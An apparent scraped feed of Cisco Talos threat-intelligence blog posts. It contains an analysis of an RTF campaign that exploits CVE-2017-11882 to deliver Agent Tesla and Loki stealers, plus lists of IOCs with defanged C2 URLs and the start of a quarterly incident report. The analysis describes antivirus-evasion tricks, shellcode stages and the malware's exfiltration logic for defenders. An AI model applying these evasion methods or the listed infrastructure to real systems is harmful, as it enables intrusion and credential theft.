\n2a21f728282b33b89e6cbd99db52651931b534be9837d99eacf87cfd748c3cba \n91b6219f4a8903773492fd83fe02e6aa8729e378f559c5cc9f115a2304f89e57 \n4f73923c23354ac5050f012f607342362eaf1d691ce1b64ea1e831038cc4236c \nebbed2fcd7fe4dc8a95cc60ab9c8e98609bcf3ba5696507252c65cc6be748b14 \nd1f9549943b936ba54d87a5befd2d241fcddac6f0caf8c786f6034ab18b8e61d \nae7cacc7a16cb48cb40473ad0269331c392f8eb0fef8ebe2d90f3592fccb306c \n00cb817330768b33a30bcf7a6a67d0269aa32f8099aee3ecd18da0e31d096610 \ne93994bf78b13d3bdee1682faf6c6544246fbd6d95a0aa043ac175ad0b905646 \n822c1239203db0bfdde3d0b65f50e53f7ee155638d4743b14f58267fa3e76531 \n5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825 \n8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72 \n82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 \n \n\n\n### C2 Servers\n\nhxxp://www[.]drylipc[.]com/em1/ \nhxxp://www[.]handanzhize[.]info/d5/ \nhxxp://www[.]bddxpso[.]info/d7/ \nhxxp://www[.]newraxz[.]com/as/ \nhxxp://www[.]atopgixn[.]info/de8/ \nhxxp://www[.]cretezzy[.]com/am/ \nhxxp://www[.]casiinoeuros[.]info/d3/ \nhxxp://www[.]newraxz[.]com/as/ \nhxxp://www[.]cretezzy[.]com/do/ \nhxxp://www[.]newraxz[.]com/as/ \n\n\n### Overlaps Samples\n\n5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825 \nhxxp://alphastand[.]top/alien/fre.php \nhxxp://alphastand[.]trade/alien/fre.php \nhxxp://igtckeep[.]com/dor/fre.php \nhxxp://alphastand[.]win/alien/fre.php \nhxxp://kbfvzoboss[.]bid/alien/fre.php \nhxxp://www[.]cretezzy[.]com/do/ \n \n8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72 \nhxxp://ukonlinejfk[.]ru/mine/fre.php \nhxxp://alphastand[.]top/alien/fre.php \nhxxp://alphastand[.]trade/alien/fre.php \nhxxp://alphastand[.]win/alien/fre.php \nhxxp://kbfvzoboss[.]bid/alien/fre.php \nhxxp://www[.]beemptty[.]com/se/ \n \n82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 hxxp://ukonlinejfk[.]ru/mine/fre.php \nhxxp://alphastand[.]top/alien/fre.php \nhxxp://alphastand[.]trade/alien/fre.php \nhxxp://alphastand[.]win/alien/fre.php \nhxxp://kbfvzoboss[.]bid/alien/fre.php \nhxxp://www[.]beemptty[.]com/se/", "cvss3": {}, "published": "2018-06-20T08:00:00", "type": "talosblog", "title": "My Little FormBook", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882"], "modified": "2018-06-22T06:50:12", "id": "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/2jDxbPnn_WQ/my-little-formbook.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T08:23:31", "description": "This blog post was authored by [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>) and [Holger Unterbrink](<http://blogs.cisco.com/author/holgerunterbrink>) with contributions from [Emmanuel Tacheau](<https://blogs.cisco.com/author/emmanueltacheau>). \n \n \n\n\n### Executive Summary\n\n \nCisco Talos has discovered a new malware campaign that drops the sophisticated information-stealing trojan called \"Agent Tesla,\" and other malware such as the Loki information stealer. Initially, Talos' telemetry systems detected a highly suspicious document that wasn't picked up by common antivirus solutions. However, [Threat Grid](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>), Cisco's unified malware analysis and threat intelligence platform, identified the unknown file as malware. The adversaries behind this malware use a well-known exploit chain, but modified it in such a way so that antivirus solutions don't detect it. In this post, we will outline the steps the adversaries took to remain undetected, and why it's important to use more sophisticated software to track these kinds of attacks. If undetected, Agent Tesla has the ability to steal user's login information from a number of important pieces of software, such as Google Chrome, Mozilla Firefox, Microsoft Outlook and many others. It can also be used to capture screenshots, record webcams, and allow attackers to install additional malware on infected systems. \n \n \n \n\n\n### Technical Details\n\n \nIn most cases, the first stage of the attack occurred in a similar way to the FormBook malware campaign, which we discussed earlier this year in a [blog post](<https://blog.talosintelligence.com/2018/06/my-little-formbook.html>). The actors behind the previous FormBook campaign used CVE-2017-0199 \u2014 a remote code execution vulnerability in multiple versions of Microsoft Office \u2014 to download and open an RTF document from inside a malicious DOCX file. We have also observed newer campaigns being used to distribute Agent Tesla and Loki that are leveraging CVE-2017-11882. An example of one of the malware distribution URLs is in the screenshot below. Besides Agent Tesla and Loki, this infrastructure is also distributing many other malware families, such as Gamarue, which has the ability to completely take over a user's machine and has the same capabilities as a typical information stealer. \n \nThe aforementioned FormBook blog contains more information about this stage. Many users have the assumption that modern Microsoft Word documents are less dangerous than RTF or DOC files. While this is partially true, attackers can still find ways with these newer file formats to exploit various vulnerabilities. \n\n\n \n[](<https://4.bp.blogspot.com/-ILV99MjYnYg/W8BAtVH4IMI/AAAAAAAABGk/bB1Yb8eFqgstw9tlTMs6jO-9mc3LilCNgCEwYBhgL/s1600/image4.jpg>) \n--- \nFigure 1 - First stage exploit \n \n \nIn the case of Agent Tesla, the downloaded file was an RTF file with the SHA256 hash _cf193637626e85b34a7ccaed9e4459b75605af46cedc95325583b879990e0e61_. At the time the file was analyzed, it had almost no detections on the multi-engine antivirus scanning website VirusTotal. Only two out of 58 antivirus programs found anything suspicious. The programs that flagged this sample were only warning about a wrongly formatted RTF file. AhnLab-V3 marked it for \"_RTF/Malform-A.Gen,_\" while Zoner said it was likely flagged for \"_RTFBadVersion._\" \n \nHowever, Cisco's Threat Grid painted a different picture, and identified the file as malware. \n \n[](<https://4.bp.blogspot.com/-AdU3QUF6Js4/W8BA_uspvGI/AAAAAAAABGs/XU0vYsypV8MyWfMQOBwSWmxrATBzNCkAwCLcBGAs/s1600/image9.jpg>) \n--- \nFigure 2 - ThreatGrid Behavior Indicators (BI) \n \nFigure 2 above shows just a subset of the triggered behaviour indicators (BI), and the part of the process tree below shows the highly suspicious execution chain. \n[](<https://2.bp.blogspot.com/-LeFQOuQ_ya4/W8BBK47xBXI/AAAAAAAABGw/6BDGYoJ_bo02kBYvHiDTxP1JUIdtZcXTgCLcBGAs/s1600/image22.jpg>) \n--- \nFigure 3 - ThreatGrid process tree \n \nIn figure 3, we can see that _Winword.exe_ starts, and a bit later, a _svchost_ process executes the Microsoft Equation Editor (_EQNEDT32.exe_), which starts a process called \"_scvhost.exe_\". Equation Editor is a tool that Microsoft Office uses as a helper application to embed mathematical equations into documents. Word for example, uses OLE/COM functions to start the Equation Editor, which matches what we see in figure 3. It's pretty uncommon for the Equation Editor application to start other executables, like the executable shown in figure 3. Not to mention that an executable using such a similar name, like the system file \"svchost.exe,\" is suspicious on its own. A user could easily miss the fact that the file name is barely changed. \n \nThe Threat Grid process timeline below confirms that this file is behaving like typical malware. \n \n[](<https://4.bp.blogspot.com/-XIN650TNc_Y/W8BBVA6ih-I/AAAAAAAABG4/1Q7JO2yJAzwokrBVjPfgCUe9EEpu6vHaACLcBGAs/s1600/image18.jpg>) \n--- \nFigure 4 - ThreatGrid process timeline \n \nYou can see in figure 4 at points 1 and 2 that the Equation Editor downloaded a file called \"_xyz[1].123_\" and then created the _scvhost.exe_ process, which created another instance [_scvhost.exe(26)_] of itself a bit later (blue rectangle). Typical command and control (C2) traffic follows at point 4. At this point, we were sure that this is malware. The question was \u2014 why isn't it detected by any antivirus systems? And how does it manage to fly under the radar? \n \n\n\n#### The malicious RTF file\n\n \nThe [RTF standard](<https://en.wikipedia.org/wiki/Rich_Text_Format>) is a proprietary document file format developed by Microsoft as a cross-platform document interchange. A simplified, standard RTF file looks like what you can see in figure 4. It is built out of text and control words (strings). The upper portion is the source code and the lower shows how this file is displayed in Microsoft Word. \n \n[](<https://3.bp.blogspot.com/-hRZSOhjK_QI/W8BBnhJ_wSI/AAAAAAAABHE/if4_SiMzATofK-0VJPrnErvDWBEJB8-pACLcBGAs/s1600/image11.jpg>) \n--- \nFigure 5 - Simple RTF document \n \nRTF files do not support any macro language, but they do support Microsoft Object Linking and Embedding (OLE) objects and Macintosh Edition Manager subscriber objects via the '_\\object_' control word. The user can link or embed an object from the same or different format into the RTF document. For example, the user can embed a mathematical equation formula, created by the Microsoft Equation Editor into the RTF document. Simplified, it would be stored in the object's data as a hexadecimal data stream. If the user opens this RTF file with Word, it hands over the object data to the Equation Editor application via OLE functions and gets the data back in a format that Word can display. In other words, the equation is displayed as being embedded in the document, even if Word could not handle it without the external application. This is pretty much what the file \"_3027748749.rtf_\" is doing. The only difference is, it is adding a lot of obfuscation, as you can see in figure 6. The big disadvantages of the RTF standard are that it comes with so many control words and common RTF parsers are supposed to ignore anything they don't know. Therefore, adversaries have plenty of options to [obfuscate](<https://www.decalage.info/rtf_tricks>) the content of the RTF files. \n \n[](<https://3.bp.blogspot.com/-8urxEcUMqcE/W8BByV41d8I/AAAAAAAABHI/2AuyOyKN65UbGg7vNmh-uw1uOWKtFf11ACLcBGAs/s1600/image17.jpg>) \n--- \nFigure 6 - 3027748749.rtf \n \nWe were able to use the rtfdump/rtfobj tools to verify the structure and extract the actual object data payload, despite the fact that the RTF file was heavily obfuscated. Figure 8 shows that the file tries to start the Microsoft Equation Editor (class name: _EQuATioN.3_). \n \n[](<https://2.bp.blogspot.com/-IuTRucql3y0/W8BB3_Vg4AI/AAAAAAAABHQ/9Z851oIRZo8zEFgUWvaLrl7dhb3mmR6zwCLcBGAs/s1600/image12.jpg>) \n--- \nFigure 7 - rtfdump \n \n[](<https://2.bp.blogspot.com/-NAyFkiKdVo0/W8BB9aZiUWI/AAAAAAAABHU/ClHt29o6Nl8oaUvZYZOgetp8aAdhKk1CQCLcBGAs/s1600/image15.jpg>) \n--- \nFigure 8 - rtfobj \n \nIn figure 6, you can also see that the adversaries are using the _\\objupdate_ trick. This [forces](<http://latex2rtf.sourceforge.net/rtfspec_7.html>) the embedded object to update before it's displayed. In other words, the user does not have to click on the object before it's loaded. This would be the case for \"normal\" objects. But by force-opening the file, the exploit starts right away. \n \nLet's have a look to the _objdata_ content from above, converted to a hexadecimal binary stream. More header details can be found [here](<https://msdn.microsoft.com/en-us/library/dd942076.aspx>). \n \n[](<https://2.bp.blogspot.com/-TomP_Us90PA/W8BCCb3CtgI/AAAAAAAABHc/imgooVloC9082dzE_wxc5Zwk-zhaBMHcQCLcBGAs/s1600/image8.jpg>) \n--- \nFigure 9 - Headers \n \nWe can find a similar [MTEF Header](<http://rtf2latex2e.sourceforge.net/MTEF3.html>) like the one described in the FormBook post, but to avoid detection, the adversaries have changed the header's values. The only difference is that, except in the MTEF version field, the actors have filled the header fields with random values. The MTEF version field needs to be 2 or 3 to make the exploit work. \n \n[](<https://1.bp.blogspot.com/-wdCoA-CMwNk/W8BCHlTJL5I/AAAAAAAABHg/CRbl37wsZE0y5U9UocpKquCqU_7Jg5d8gCLcBGAs/s1600/image13.jpg>) \n--- \nFigure 10 - MTEF V2 header \n \nAfter the MTEF header, we have an unknown MTEF byte stream tag of two bytes (F1 01) followed by the a _Font Tag (08 E0 7B \u2026 )_.The bytes following the Font Tag (B9 C3 \u2026) do not look like a normal font name, so this is a good indicator that we are looking at an exploit. The bytes do look very different to what we have seen in our research mentioned previously, but let's decode them. \n \n[](<https://1.bp.blogspot.com/-wf-KqIAw0s8/W8BCMU1plEI/AAAAAAAABHk/5YIWLXtDuncpAlx8chqMJthkDqwm6W3dQCLcBGAs/s1600/image7.jpg>) \n--- \nFigure 11 - Shellcode - new campaign. \n \nThis looks pretty similar to what we have seen before. In figure 12, you can see the decoded shellcode from our previous research. \n \n[](<https://4.bp.blogspot.com/-6JYpgmfLDx0/W8BCRMyfRbI/AAAAAAAABHs/A-Oq-eq7NqAgp6nWnK-5ZvccGtN0MttMgCLcBGAs/s1600/image27.jpg>) \n--- \nFigure 12 - Shellcode - former campaign. \n \nThe adversaries have just changed registers and some other minor parts. At this point, we are already pretty sure that this is CVE-2017-11882, but let's prove this. \n \n\n\n#### PyREBox rock 'n' roll\n\n \nIn order to verify that the malicious RTF file is exploiting CVE-2017-11882, we used PyREBox, a dynamic analysis engine developed by Talos. This tool allows us to instrument the execution of a complete system and monitor different events, such as instruction execution, memory read and writes, operating system events, and also provides interactive analysis capabilities that allow us to inspect the state of the emulated system at any time. For additional information about the tool, please refer to the [blog posts](<https://blog.talosintelligence.com/2018/04/malware-monitor-pyrebox-for-analysis.html>) about its release and the [malware monitoring scripts](<https://github.com/Cisco-Talos/pyrebox/tree/master/mw_monitor>) [presented](<https://github.com/Cisco-Talos/pyrebox/tree/master/docs/pyrebox_hitb_ams.pdf>) at the Hack in the Box 2018 conference. \n \nFor this analysis, we leveraged the shadow stack plugin, which was released together with other exploit analysis scripts (shellcode detection and stack pivoting detection) at [EuskalHack](<https://securitycongress.euskalhack.org/>) Security Congress III earlier this year ([slides available](<https://github.com/Cisco-Talos/pyrebox/tree/master/docs/pyrebox_euskalhack.pdf>)). This script monitors all the call and RET instructions executed under the context of a given process (in this case, the equation editor process), and maintains a shadow stack that keeps track of all the valid return addresses (those that follow every executed call instruction). \n \nThe only thing we need to do is configure the plugin to monitor the equation editor process (the plugin will wait for it to be created), and open the RTF document inside the emulated guest. PyREBox will stop the execution of the system whenever a RET instruction jumps into an address that is not preceded by a call instruction. This approach allows us to detect the exploitation of stack overflow bugs that overwrite the return address stored on the stack. Once the execution is stopped, PyREBox spawns an interactive IPython shell that allows us to inspect the system and debug and/or trace the execution of the equation editor process. \n \n[](<https://4.bp.blogspot.com/-n5aDd19Wu0c/W8BCWq--HWI/AAAAAAAABH0/HfE4m36Q9nYJyq7UZ9UOemc1uX4g_9SxACLcBGAs/s1600/image1.jpg>) \n--- \nFigure 13 - PyREBox stops the execution the moment it detects the first return to an invalid address: 0x44fd22. \n \nPyREBox will stop the execution on the return address at _0x00411874_, which belongs to the vulnerable function reported in CVE-2017-11882. In this case, the malware authors decided to leverage this vulnerability to overwrite the return address with an address contained in Equation Editor's main executable module: _0x0044fd22_. If we examine this address (see Figure 13), we see that it points to another RET instruction that will pop another address from the stack and jump into it. The shadow stack plugin detects this situation again, and stops the execution on the next step of the exploit. \n \n[](<https://2.bp.blogspot.com/-VlmeyCM3E38/W8BCbWgt2TI/AAAAAAAABH8/oF3Xfp9YF3IyUWPeznxFEFVF5_dd__ytQCLcBGAs/s1600/image5.jpg>) \n--- \nFigure 14 \u2014 First stage of the shellcode. \n \nFigure 14 shows the first stage of the shellcode, which is executed right after the second RET. This shellcode will call to GlobalLock function (_0x18f36e_) and afterward, will jump into a second buffer containing the second stage of the shellcode. \n \n[](<https://2.bp.blogspot.com/-R_FvoE_sbvk/W8BCfja_UlI/AAAAAAAABIE/r2NyOets62sZ_NP17_OF2HN3sBYPactFwCLcBGAs/s1600/image25.jpg>) \n--- \nFigure 15 - Start of the second stage of the shellcode. \n \nThe second stage of the shellcode consists of a sequence of _jmp/call_ instructions followed by a decryption loop. \n \n[](<https://4.bp.blogspot.com/-YlKfQJkvM-Y/W8BCkSebikI/AAAAAAAABIM/MkCEs_txmroY6kExD0RjtznAP19Jw_KBgCLcBGAs/s1600/image19.jpg>) \n--- \nFigure 16 - Decryption loop of the second stage of the shellcode. \n \nThis decryption loop will unpack the final payload of the shellcode, and finally jump into this decoded buffer. PyREBox allows us to dump the memory buffer containing the shellcode at any point during the execution. There are several ways to achieve this, but one possible way is to use the volatility framework (which is available through the PyREBox shell) to list the VAD regions in the process and dump the buffer containing the interesting code. This buffer can then be imported into IDA Pro for a deeper analysis. \n \n[](<https://2.bp.blogspot.com/-wmjf8-n97_Y/W8BCp6-nzjI/AAAAAAAABIQ/uIvADLJnTcsUoe_MLk-vdaASy0kp3O9pACLcBGAs/s1600/image21.jpg>) \n--- \nFigure 17 \u2014 Decrypted buffer of the second stage (final stage of the shellcode). \n \nThis final stage of the shellcode is quite straightforward. It leverages standard techniques to find the _kernel32.dll_ module in the linked list of loaded modules available in the PEB, and afterward, will parse its export table to locate the _LoadLibrary_ and _GetProcAddress_ functions. By using these functions, the script resolves several API functions (_ExpandEnvironmentStrings_, _URLDownloadToFileA_, and _ShellExecute_) to download and execute the _xyz.123_ binary from the URL, which we have already seen in the Threat Grid analysis. The shellcode starts this executable with the name \"_scvhost.exe_,\" which we have also seen before in the Threat Grid report. \n \nWe have also seen several other campaigns using the exact same infection chain, but delivering Loki as the final payload. We list these in the IOC sections. \n \n \n\n\n#### Payload details\n\n \nLet's look into the final payload file \"_xyz.123_\" (_a8ac66acd22d1e194a05c09a3dc3d98a78ebcc2914312cdd647bc209498564d8_) or \"_scvhost.exe_\" if you prefer the process name from above. \n \n_$ file xyz123.exe_ \n \nxyz123.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows \n \nLoading the file into [dnSpy](<https://github.com/0xd4d/dnSpy>) \u2014 a .NET assembly editor, decompiler and debugger \u2014 confirms that it's a .NET executable that's heavily obfuscated. \n \n[](<https://2.bp.blogspot.com/-QEclaZoNCTo/W8BC0wcWJ_I/AAAAAAAABIc/TcEd0Os-4TwXEH1ZOr0LjPPTxC3Rvpk9wCLcBGAs/s1600/image10.jpg>) \n--- \nFigure 18 - xyz123.exe. \n \nThe execution starts at the class constructor (cctor) executing the \n\n \n \n <Module>.\u04ad\u044a\u0429\u04c2\u04ec\u0480\u0423\\u0486\\u0489\u0457\u0492\u0440\u0435\u04f1\u04a4\u042b\u045d\u0439\u04b9\u041f()\n\nmethod. It loads a large array into memory and decodes it. The rest of the cctor reconstructs a _xs.dll_ and other code from the array and proceeds at the entry point with additional routines. At the end, it jumps by calling the _P.M()_ method into the _xs.dll_. \n \n[](<https://2.bp.blogspot.com/-ZJW7ZuXEm1Q/W8BC7lhSbqI/AAAAAAAABIk/anPBxSiGEIcS0LZn-STyNvjh8GiEx8suwCLcBGAs/s1600/image3.jpg>) \n--- \nFigure 19 - P.M() method. \n \nThis one is interesting because it presents us a well-known artifact that shows that the assembly was obfuscated with the [Agile.Net obfuscator](<https://secureteam.net/acode-features-detailed>). \n \n[](<https://2.bp.blogspot.com/-KGSOdxd3xwo/W8BC_hM4ZwI/AAAAAAAABIo/NZkq-OzRqegN4h4GDJBQ97gsFaZU9XUQgCLcBGAs/s1600/image14.jpg>) \n--- \nFigure 20 - Agile.Net obfuscator artifact. \n \nSince there is no custom obfuscation, we can just execute the file, wait a while, and dump it via [Megadumper](<https://github.com/CodeCracker-Tools/MegaDumper>), a tool that dumps .NET executables directly from memory. This already looks much better. \n \n[](<https://4.bp.blogspot.com/-BwOtG5nISrQ/W8BDEWtGviI/AAAAAAAABIs/ZA1HJPDevcgsecDWrTf5qaziMmN4_pdOACLcBGAs/s1600/image2.jpg>) \n--- \nFigure 21 - Deobfuscated code step one. \n \nUnfortunately, the obfuscator has encrypted all strings with the H.G() method and we cannot see the content of those strings. \n \n[](<https://1.bp.blogspot.com/-6ffzd31SuBw/W8BDJHG8EwI/AAAAAAAABI0/tNGwTJY5kjES9kV0AqNQtP2xnRJx06e-ACLcBGAs/s1600/image6.jpg>) \n--- \nFigure 22 - H.G() method \n \nLuckily, the de4dot .NET deobfuscator tool kills this with one command. We just need to tell it which method in the sample is used to decrypt the strings at runtime. This is done by handing over the Token from the corresponding method, in this case, _0x06000001_. De4dot has an issue with auto-detecting the Agile .NETobfuscator, so we have to hand over this function via the '-p' option. \n \n[](<https://1.bp.blogspot.com/-Y4iL1AL-I9I/W8BDOQwHg8I/AAAAAAAABI8/NMx7LTkIchQ0pMlCr6xSmUCWMzai0FUeACLcBGAs/s1600/image20.jpg>) \n--- \nFigure 23 - de4dot .NET deobfuscator. \n \nEven if it looks like the operation failed, it has successfully replaced all obfuscated strings and recovered them, as we can see below. \n \n[](<https://4.bp.blogspot.com/-WF2WPbXz8DQ/W8BDT2VEZ_I/AAAAAAAABJE/o4GyE8mvU0QKb5LiYSPh_QkTV_2leu8igCLcBGAs/s1600/image16.jpg>) \n--- \nFigure 24 - Decoded strings. \n \nExamining the source code shows us that the adversaries are using an information stealer/RAT sold by a company selling grayware products: [Agent Tesla](<https://www.agenttesla.com/>). Agent Tesla contains a number of questionable functions, such as password stealing, screen capturing and the ability to download additional malware. However, the sellers of this product say that it is used for password recovery and child monitoring. \n \n[](<https://4.bp.blogspot.com/-zTrWTm6VAy8/W8BDboHnAnI/AAAAAAAABJQ/OfsXCyhG6Rw38nIPxF0HrycQjfMk_YTBQCLcBGAs/s1600/image28.jpg>) \n--- \nFigure 25 - Sample of password stealing methods. \n \nThe malware comes with password-stealing routines for more than 25 common applications and other rootkit functions such as keylogging, clipboard stealing, screenshots and webcam access. Passwords are stolen from the following applications, among others: \n \n\n\n * Chrome\n * Firefox\n * Internet Explorer\n * Yandex\n * Opera\n * Outlook\n * Thunderbird\n * IncrediMail\n * Eudora\n * FileZilla\n * WinSCP\n * FTP Navigator\n * Paltalk\n * Internet Download Manager\n * JDownloader\n * Apple keychain\n * SeaMonkey\n * Comodo Dragon\n * Flock\n * DynDNS\n \n \nThis version comes with routines for SMTP, FTP and HTTP exfiltration, but is using only the HTTP POST one which you can see in figure 26 below. The decision as to which exfiltration method is used is hardcoded in a variable stored in the configuration, which is checked in almost all methods like this: \n \n_if (Operators.CompareString(_P.Exfil, \"webpanel\", false) == 0)_ \n_..._ \n_else if (Operators.CompareString(_P.Exfil, \"smtp\", false) == 0)_ \n_..._ \n_else if (Operators.CompareString(_P.Exfil, \"ftp\", false) == 0)_ \n \n[](<https://2.bp.blogspot.com/-T9HdQCnJUZQ/W8BDhAbrD_I/AAAAAAAABJU/7YEmwrRiK6QfG30pCwlFINoci7b5YiYWQCLcBGAs/s1600/image24.jpg>) \n--- \nFigure 26 - HTTP exfiltration routine. \n \nFor example, it creates the POST request string, as you can see below in figure 27. \n \n[](<https://4.bp.blogspot.com/-Pj4IeEedwZo/W8BDn97V6zI/AAAAAAAABJc/W3ATPS-lm24DVVukEnIk_QcAeoQ9--iEgCLcBGAs/s1600/image26.jpg>) \n--- \nFigure 27 - POST request. \n \nThen, it encrypts it with 3DES before sending it (figure 28). The _P.Y (_\"0295A...1618C\"_) method in figure 26 creates the MD5 hash of the string. This hash is used as secret for the 3DES encryption. \n \n[](<https://3.bp.blogspot.com/-US3FVkl4HyY/W8BD5sEkUgI/AAAAAAAABJs/P5CbK9M-DwIAy2RwkXw1m59pDcaLKdKjwCLcBGAs/s1600/image23.jpg>) \n--- \nFigure 28 - 3DES Encryption method| \n| \n \n \n\n\n \n\n\n#### Conclusion\n\n \nThis is a highly effective malware campaign that is able to avoid detection by most antivirus applications. Therefore, it is necessary to have additional tools such as Threat Grid to defend your organization from these kinds of threats. \n \nThe actor behind this malware used the RTF standard because of its complexity, and used a modified exploit of a Microsoft Office vulnerability to download Agent Tesla and other malware. It is not completely clear if the actor changed the exploit manually, or if they used a tool to produce the shellcode. Either way, this shows that the actor or their tools have ability to modify the assembler code in such a way that the resulting opcode bytes look completely different, but still exploit the same vulnerability. This is a technique that could very well be used to deploy other malware in a stealthy way in the future. \n \n\n\n#### IOC\n\n \n**Maldocs** \n \ncf193637626e85b34a7ccaed9e4459b75605af46cedc95325583b879990e0e61 - 3027748749.rtf \n \nA8ac66acd22d1e194a05c09a3dc3d98a78ebcc2914312cdd647bc209498564d8 - xyz.123 \n \n38fa057674b5577e33cee537a0add3e4e26f83bc0806ace1d1021d5d110c8bb2 - Proforma_Invoice_AMC18.docx \n \n4fa7299ba750e4db0a18001679b4a23abb210d4d8e6faf05ce2cbe2586aff23f - Proforma_Invoice_AMC19.docx \n \n1dd34c9e89e5ce7a3740eedf05e74ef9aad1cd6ce7206365f5de78a150aa9398 - HSBC8117695310_doc \n \n \n**Distribution Domains** \n \navast[.]dongguanmolds[.]com \navast[.]aandagroupbd[.]website \n \n \n**Loki related samples from hxxp://avast[.]dongguanmolds[.]com** \n \na8ac66acd22d1e194a05c09a3dc3d98a78ebcc2914312cdd647bc209498564d8 - xyz.123 \n \n5efab642326ea8f738fe1ea3ae129921ecb302ecce81237c44bf7266bc178bff - xyz.123 \n \n55607c427c329612e4a3407fca35483b949fc3647f60d083389996d533a77bc7 - xyz.123 \n \n992e8aca9966c1d42ff66ecabacde5299566e74ecb9d146c746acc39454af9ae - xyz.123 \n \n1dd34c9e89e5ce7a3740eedf05e74ef9aad1cd6ce7206365f5de78a150aa9398 - HSBC8117695310.doc \n \nd9f1d308addfdebaa7183ca180019075c04cd51a96b1693a4ebf6ce98aadf678 - plugin.wbk \n \n \n**Loki related URLs:** \n \nhxxp://46[.]166[.]133[.]164/0x22/fre.php \nhxxp://alphastand[.]top/alien/fre.php \nhxxp://alphastand[.]trade/alien/fre.php \nhxxp://alphastand[.]win/alien/fre.php \nhxxp://kbfvzoboss[.]bid/alien/fre.php \nhxxp://logs[.]biznetviigator[.]com/0x22/fre.php \n \n \n**Other related samples** \n \n1dd34c9e89e5ce7a3740eedf05e74ef9aad1cd6ce7206365f5de78a150aa9398 \n7c9f8316e52edf16dde86083ee978a929f4c94e3e055eeaef0ad4edc03f4a625 \n8b779294705a84a34938de7b8041f42b92c2d9bcc6134e5efed567295f57baf9 \n996c88f99575ab5d784ad3b9fa3fcc75c7450ea4f9de582ce9c7b3d147f7c6d5 \ndcab4a46f6e62cfaad2b8e7b9d1d8964caaadeca15790c6e19b9a18bc3996e18 \n \n \n\n\n", "cvss3": {}, "published": "2018-10-15T09:00:00", "type": "talosblog", "title": "Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882"], "modified": "2018-10-16T06:40:02", "id": "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/NV2-ZeRVf-Q/old-dog-new-tricks-analysing-new-rtf_15.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-10-25T14:57:59", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWPiUDOCaAHB7xNjjit18SDXXyYY5kILn-CsC5Gc3TcI-LK2dJpjVx4YIGSt4H7MF3w0KfwAuhbJUJAdgdCAKwJ88xrGmAZvV7PeqxZeCZlPdPdEYd49dQjXjPCIy1z9fbjUOU2UrNj8wjaiopIwboPVrMAuX65m1OHelKAy78iB-fA3xe_XJBA9XN/s1500/TIR_quarterly_trends_banner.jpg>)\n\n \n\n\n### \n\n\n### Ransomware and pre-ransomware engagements make up 40 percent of threats seen this quarter\n\n_By Caitlin Huey._\n\nFor the first time since compiling these reports, Cisco Talos Incident Response saw an equal number of ransomware and pre-ransomware engagements, making up nearly 40 percent of threats this quarter. \n\nIt can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place. However, Talos IR assesses that the [combination of Cobalt Strike](<https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf>) and credential-harvesting tools like Mimikatz, paired with enumeration and discovery techniques, indicates a high likelihood that ransomware is the final objective.\n\n[](<https://talosintelligence.com/resources/543>)\n\nThis quarter featured a variety of publicly available tools and scripts hosted on GitHub repositories or other third-party websites to support operations across multiple stages of the attack lifecycle. This activity coincides with a general increase in the use of other dual-use tools, such as the legitimate red-teaming tool Brute Ratel and the recently discovered [Manjusaka](<https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html>) and [Alchimist](<https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html>) attack frameworks. \n\n[.jpg)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgs8-vXMLleDlwAs0W5Ju_9cgoE8Rkzh4are8Oc0aNazxuObHTOVO5Fevq75Tlixl49DdoHZbCrFNJcK_7HzpCqcI-l86s1976bm7-nj1WNBWOL0dX-C_5OMmHgBUHU-zipY7JviFNMK1ucbERQ77lm8R9lsz5xqpTGRYD5RP1pBVFEVPp49aMkP0T/s2001/TopThreats-dark\\(1\\).jpg>)\n\n \n\n\n \n\n\n## Targeting\n\nAttackers targeted the education sector the most of any vertical this quarter, closely followed by the financial services, government, and energy sectors, respectively. For the first time since Q4 2021, telecommunications was not the top-targeted vertical. While the reason for the education sector being more frequently targeted this quarter is unknown, this is a popular time of year for adversaries to target education institutions as students and teachers return to school.\n\n[.jpg)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7HEE12kQoDh7FeGzIEdlORUOZwLrsxkkdvftktGAL6Vvom8-qABOruW0Qg7b6g8qfY6P92DmswJwQb2HZnZ3EW95adUFucIOGAtcrE165TgbbIaW16fi9q0XVf7nUrtU4tUuPJ02Dw_zVheTctwbThjUZ8D4oDm01RsK8LDWHjjw1LRtDeiAf4sen/s2001/Target-dark\\(1\\).jpg>)\n\n \n\n\n \n\n\n## Ransomware\n\nWe observed two previously seen high-profile ransomware families, Vice Society and [Hive](<https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html>). This quarter also saw a ransomware family that had yet to be observed in IR engagements, Black Basta, which first emerged in April 2022. \n\nTalos IR responded to a Vice Society ransomware engagement affecting an education institution in Austria, part of an ongoing trend of Vice Society actors disproportionately targeting the education sector, which is consistent with [U.S. 